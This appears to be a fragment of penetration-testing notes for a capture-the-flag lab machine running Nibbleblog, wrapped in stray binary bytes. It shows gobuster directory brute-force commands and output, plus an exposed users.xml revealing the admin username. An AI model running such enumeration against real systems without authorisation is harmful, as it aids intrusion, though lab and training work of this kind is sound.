custom-colors,Aפ"(Srdlists/big.txt -u http://10.10.10.75/nibbleblog =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.75/nibbleblog [+] Threads: 10 [+] Wordlist: /usr/share/dirb/wordlists/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/04/09 09:44:54 Starting gobuster =============================================================== /.htaccess (Status: 403) /.htpasswd (Status: 403) /README (Status: 200) /admin (Status: 301) /content (Status: 301) /languages (Status: 301) /plugins (Status: 301) /themes (Status: 301) =============================================================== 2020/04/09 09:47:04 Finished =============================================================== gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.75/nibbleblog/content =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.75/nibbleblog/content [+] Threads: 10 [+] Wordlist: /usr/share/dirb/wordlists/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/04/10 10:13:05 Starting gobuster =============================================================== /.htaccess (Status: 403) /.htpasswd (Status: 403) /private (Status: 301) /public (Status: 301) /tmp (Status: 301) =============================================================== 2020/04/10 10:15:15 Finished =============================================================== /private/users.xml <users> <user username="admin"> <id type="integer">0</id> <session_fail_count type="integer">0</session_fail_count> <session_date type="integer">1514544131</session_date> </user> <blacklist type="string" ip="10.10.10.1"> <date type="integer">1512964659</date> <fail_count type="integer">1</fail_count> </blacklist> </users> custom-colors$A?&xAפ =@Ĝ